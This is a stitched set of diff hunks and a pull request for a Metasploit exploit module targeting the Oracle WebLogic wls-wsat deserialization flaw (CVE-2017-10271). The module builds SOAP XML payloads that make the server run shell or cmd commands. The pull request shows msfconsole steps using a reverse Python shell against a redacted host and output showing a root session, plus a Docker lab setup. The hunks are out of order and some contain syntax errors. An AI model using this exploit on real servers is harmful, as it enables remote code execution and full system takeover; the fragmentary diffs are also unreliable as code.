+++ b/modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
@@ -56,11 +56,11 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def cmd_base
-    target_platform == 'win' ? 'cmd' : '/bin/sh'
+    target['Platform'] == 'win' ? 'cmd' : '/bin/sh'
   end
 
   def cmd_opt
-    target_platform == 'win' ? '/c' : '-c'
+    target['Platform'] == 'win' ? '/c' : '-c'
   end
 
   def process_builder_payload

--- a/modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
+++ b/modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
@@ -51,7 +51,7 @@ class MetasploitModule < Msf::Exploit::Remote
     register_options([
       OptString.new('TARGETURI', [true, 'The base path to the WebLogic WSAT endpoint', '/wls-wsat/CoordinatorPortType']),
       Opt::RPORT(7001, true, 'The remote port that the WebLogic WSAT endpoint listens on')
-      OptFloat.new('TIMEOUT', [true, "The timeout value of requests to RHOST", 20])
+      OptFloat.new('TIMEOUT', [true, "The timeout value of requests to RHOST", 20.0])
     ])
   end
 

--- a/modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
+++ b/modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
@@ -162,11 +162,13 @@ class MetasploitModule < Msf::Exploit::Remote
     until @received_request
       sleep 1
       waited += 1
-      if (waited > datastore['HTTP_DELAY'])
+      if waited > datastore['HTTP_DELAY']
+        stop_service
         return Exploit::CheckCode::Safe
       end
     end
 
+    stop_service
     return Exploit::CheckCode::Vulnerable
   end
 

--- a/modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
+++ b/modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
@@ -55,7 +55,7 @@ class MetasploitModule < Msf::Exploit::Remote
       OptString.new('TARGETURI', [true, 'The base path to the WebLogic WSAT endpoint', '/wls-wsat/CoordinatorPortType']),
       OptPort.new('RPORT', [true, "The remote port that the WebLogic WSAT endpoint listens on", 7001]),
       OptFloat.new('TIMEOUT', [true, "The timeout value of requests to RHOST", 20.0]),
-      OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the check payload', 30])
+      OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the check payload', 10])
     ])
   end
 
@@ -182,8 +182,8 @@ class MetasploitModule < Msf::Exploit::Remote
 
     waited = 0
     while (not @received_request)
-      select(nil, nil, nil, 1)
-        waited += 1
+      sleep 1
+      waited += 1
       if (waited > datastore['HTTP_DELAY'])
         return Exploit::CheckCode::Safe
       end

--- a/modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
+++ b/modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
@@ -37,7 +37,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'Targets'        =>
           [
             [ 'Windows Command payload', { 'Arch' => ARCH_CMD, 'Platform' => 'win' } ],
-            [ 'Unix Command payload', { 'Arch' => ARCH_CMD, Platform => 'unix' } ],
+            [ 'Unix Command payload', { 'Arch' => ARCH_CMD, 'Platform' => 'unix' } ]
           ],
         'DisclosureDate' => "Oct 19 2017",
         # Note that this is by index, rather than name. It's generally easiest

--- a/modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
+++ b/modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
@@ -1,0 +1,162 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'           => 'Oracle WebLogic wls-wsat Component Deserialization RCE',
+        'Description'    => %q(
+            The Oracle WebLogic WLS WSAT Component is vulnerable to a XML Deserialization
+        remote code execution vulnerability. Supported versions that are affected are
+        10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0.
+        ),
+        'License'        => MSF_LICENSE,
+        'Author'         => ['d3c3pt10n <d3c3pt10n[AT]deceiveyour.team>'],
+        'References'     =>
+          [
+            [ 'URL', 'http://www.oracle.com/technetwork/middleware/weblogic/overview/index.html'],
+            [ 'CVE', '2017-10271']
+          ],
+        'Platform'      => %w{ win linux unix },
+        'Arch'          => [ ARCH_CMD ],
+        'Targets'        =>
+          [
+            [ 'Windows Command payload', { 'Arch' => ARCH_CMD, 'Platform' => 'win' } ],
+            [ 'Unix Command payload', { 'Arch' => [ARCH_CMD], Platform => 'unix' } ],
+            [ 'Linux Command payload', { 'Arch' => [ARCH_CMD], Platform => 'linux' } ]
+          ],
+        'Payload'        =>
+        {
+          'DisableNops' => true
+        },
+        'DisclosureDate' => "Oct 19 2017",
+        # Note that this is by index, rather than name. It's generally easiest
+        # just to put the default at the beginning of the list and skip this
+        # entirely.
+        'DefaultTarget'  => 0
+      )
+    )
+
+    register_options([
+      OptString.new('TARGETURI', [true, 'The base path to the WebLogic WSAT endpoint', '/wls-wsat/CoordinatorPortType']),
+      OptInt.new('TIMEOUT', [true, "The timeout in seconds", 10]),
+      OptInt.new('RPORT', [true, "The remote port that the WebLogic WSAT endpoint listens on", 7001]),
+    ])
+  end
+
+  def cmd_payload
+    # Do NOT move the ampersand to a non-first index spot or else it'll replace aspects that we need
+    # This escaping makes sure that our payload works!
+    replacements = [ ['&', '&amp;'], ['"', '&quot;'], ["'", '&apos;'], ['<', '&lt;'], ['>', '&gt;'] ]
+    xml_prepared = payload.encoded
+    replacements.each do |r|
+      xml_prepared.gsub!(r[0], r[1])
+    end
+
+    return xml_prepared
+  end
+
+  def unix_payload
+    # Generate a payload which will execute on a *nix machine using /bin/sh
+    xml = %Q{<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
+  <soapenv:Header>
+    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
+      <java>
+        <object class="java.lang.ProcessBuilder">
+          <array class="java.lang.String" length="3" >
+            <void index="0">
+              <string>/bin/sh</string>
+            </void>
+            <void index="1">
+              <string>-c</string>
+            </void>
+            <void index="2">
+              <string>#{cmd_payload}</string>
+            </void>
+          </array>
+          <void method="start"/>
+        </object>
+      </java>
+    </work:WorkContext>
+  </soapenv:Header>
+  <soapenv:Body/>
+</soapenv:Envelope>}
+  end
+
+  # Generate a payload which will execute on a Windows machine using cmd
+  def windows_payload
+    xml = %Q{<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
+  <soapenv:Header>
+    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
+      <java>
+        <object class="java.lang.ProcessBuilder">
+          <array class="java.lang.String" length="3" >
+            <void index="0">
+              <string>cmd</string>
+            </void>
+            <void index="1">
+              <string>/c</string>
+            </void>
+            <void index="2">
+              <string>#{cmd_payload}</string>
+            </void>
+          </array>
+          <void method="start"/>
+        </object>
+      </java>
+    </work:WorkContext>
+  </soapenv:Header>
+  <soapenv:Body/>
+</soapenv:Envelope>}
+  end
+
+# Not sure how to catch the response, so I'll leave this here in case someone can help
+#   def check_payload
+#     xml = %Q{<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
+#   <soapenv:Header>
+#     <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
+#       <java version="1.8" class="java.beans.XMLDecoder">
+#         <object id="url" class="java.net.URL">
+#           <string>http://{lhost}:{lport}/{random_uri}</string>
+#         </object>
+#         <object idref="url">
+#           <void id="stream" method = "openStream" />
+#         </object>
+#       </java>
+#     </work:WorkContext>
+#     </soapenv:Header>
+#   <soapenv:Body/>
+# </soapenv:Envelope>}
+#   end
+
+  #
+  # The exploit method connects to the remote service and sends 1024 random bytes
+  # followed by the fake return address and then the payload.
+  #
+  def exploit
+    target_os = datastore['TARGET'].to_i
+
+    xml_payload = ''
+    if target_os == 0
+      xml_payload = windows_payload
+    else
+      xml_payload = unix_payload
+    end
+
+    send_request_cgi(
+      'method'   => 'POST',
+      'uri'      => normalize_uri(target_uri.path),
+      'data'     => xml_payload,
+      'ctype'    => 'text/xml;charset=UTF-8',
+      'headers'  => { 'User-Agent': 'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50' }
+    )
+  end
+end

--- a/modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
+++ b/modules/exploits/multi/http/oracle_weblogic_wsat_deserialization_rce.rb
@@ -32,7 +32,7 @@ class MetasploitModule < Msf::Exploit::Remote
             [ 'Standalone Exploit', 'https://github.com/kkirsche/CVE-2017-10271'],
             [ 'CVE', '2017-10271']
           ],
-        'Platform'      => %w{ win linux unix },
+        'Platform'      => %w{ win unix },
         'Arch'          => [ ARCH_CMD ],
         'Targets'        =>
           [


### PR DESCRIPTION
Tell us what this change does. If you're fixing a bug, please mention
the github issue number.

## Verification

List the steps needed to make sure this thing works

- [x] Start `msfconsole`
- [x] `use exploit/multi/http/oracle_weblogic_wsat_deserialization_rce`
- [x] `set RHOST <IP of host>`
- [x] `set TARGET <target OS>`
- [x] `set PAYLOAD <payload>`
- [x] `set` PAYLOAD options
- [x] `exploit`
- [x] Shell should be received
- [x] **Document** the thing and how it works ([Example](https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/post/multi/gather/aws_keys.md))

## Example
```
msf > use exploit/test/oracle_weblogic_wsat_deserialization_rce
msf exploit(oracle_weblogic_wsat_rce) > set RHOST REDACTED.com
RHOST => REDACTED.com
msf exploit(oracle_weblogic_wsat_rce) > set TARGET 1
TARGET => 1
msf exploit(oracle_weblogic_wsat_rce) > set PAYLOAD cmd/unix/reverse_python
PAYLOAD => cmd/unix/reverse_python
msf exploit(oracle_weblogic_wsat_rce) > set LHOST eth0
LHOST => eth0
msf exploit(oracle_weblogic_wsat_rce) > set LPORT 4444
LPORT => 4444
msf exploit(oracle_weblogic_wsat_rce) > exploit

[*] Started reverse TCP handler on REDACTED:4444
[*] Command shell session 1 opened (REDACTED:4444 -> REDACTED:46328) at 2018-01-05 15:08:56 -0500
id
uid=0(root) gid=0(root) groups=0(root)
```

## Setting up a target
The first server which Kevin used for exploit development was a docker container of Oracle WebLogic 10.3.6.0.0. Kevin used an existing image publicly available on Docker Hub.

To download and start the container, the following commands were used:

`docker run -d -p7001:7001 -p80:7001 zhiqzhao/ubuntu_weblogic1036_domain`

This starts the container and returns a SHA hash representing the container. Kevin identified the human-friendly name using the following command:

`docker ps`

For the purpose of this writeup, Kevin will assume the name is "trusting_raman". As Docker images are stripped down and do not include the same software as a normal machine, Kevin made a modification to the container, installing Python 2 to mirror what would be found in a normal Ubuntu machine. Kevin entered the container and installed this software using the following commands, confirming the installation when prompted:

```
docker exec -it trusting_raman /bin/bash
apt-get update
apt-get install python
```
At this point, changes to the host firewall may be necessary to expose port 80 and port 7001 to the outside world. This is out of scope for this pull request

  